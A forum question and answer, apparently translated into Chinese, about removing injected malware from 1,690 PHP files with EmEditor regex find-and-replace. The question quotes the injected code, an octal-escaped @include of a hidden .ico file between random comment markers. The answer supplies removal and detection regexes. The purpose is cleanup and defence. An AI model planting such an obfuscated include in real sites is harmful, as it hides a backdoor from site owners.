我尝试找到一种使用 EMEditor 和正则表达式进行查找和替换的方法。我尝试将其应用于以下项目:
<?php
/*f04b8*/
@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";
/*f04b8*/ // ini_set(?display_errors?, 1);
我尝试替换/删除以下代码
<?php
和
// ini_set(?display_errors?, 1);
介于两者之间的所有内容都是我尝试从许多文件中提取的恶意软件脚本。
我正在寻找一种简单的方法来删除 1690 个文件中的此内容。任何想法都会非常有帮助。
祝一切顺利,托马斯
答案1
任何类似字符串的 PHP RegExpression 将是……
/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/
这可以进一步简化,但可以按原样工作
**请注意,这将找到所有出现的有问题的字符串,这些字符串以包含 5 个非换行符的随机字符的注释块开头,后跟两个新行、@include 行、另外 2 个新行和匹配的块注释闭包 - 无论文档是保存在 Windows、Mac 还是 Linux 计算机上 - 请注意 \r\n(Windows 计算机)和 \n\n(Linux 和 Mac 计算机)
我已经验证了您的字符串与正则表达式的匹配: https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/
快速提示,要找到包含混淆函数的随机字符串名称的恶意软件文件...使用以下正则表达式...
/function...\(\$..\){\$...\=."/
这应该会追踪被改变的文件,并找到与您受到影响的恶意软件相同的任何其他恶意软件文件。
祝您有美好的一天!希望这对某些人仍然有用。